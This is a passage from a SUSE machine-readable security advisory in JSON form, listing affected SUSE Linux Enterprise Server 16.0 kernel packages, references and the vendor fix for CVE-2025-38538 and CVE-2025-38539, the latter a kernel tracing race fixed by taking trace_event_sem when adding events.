"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38538"
},
{
"cve": "CVE-2025-38539",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38539"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Add down_write(trace_event_sem) when adding trace event\n\nWhen a module is loaded, it adds trace events defined by the module. It\nmay also need to modify the modules trace printk formats to replace enum\nnames with their values.\n\nIf two modules are loaded at the same time, the adding of the event to the\nftrace_events list can corrupt the walking of the list in the code that is\nmodifying the printk format strings and crash the kernel.\n\nThe addition of the event should take the trace_event_sem for write while\nit adds the new event.\n\nAlso add a lockdep_assert_held() on that semaphore in\n__trace_add_event_dirs() as it iterates the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38539",
"url": "https://www.suse.com/security/cve/CVE-2025-38539"
},
{
"category": "external",
"summary": "SUSE Bug 1248211 for CVE-2025-38539",
"url": "https://bugzilla.suse.com/1248211"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
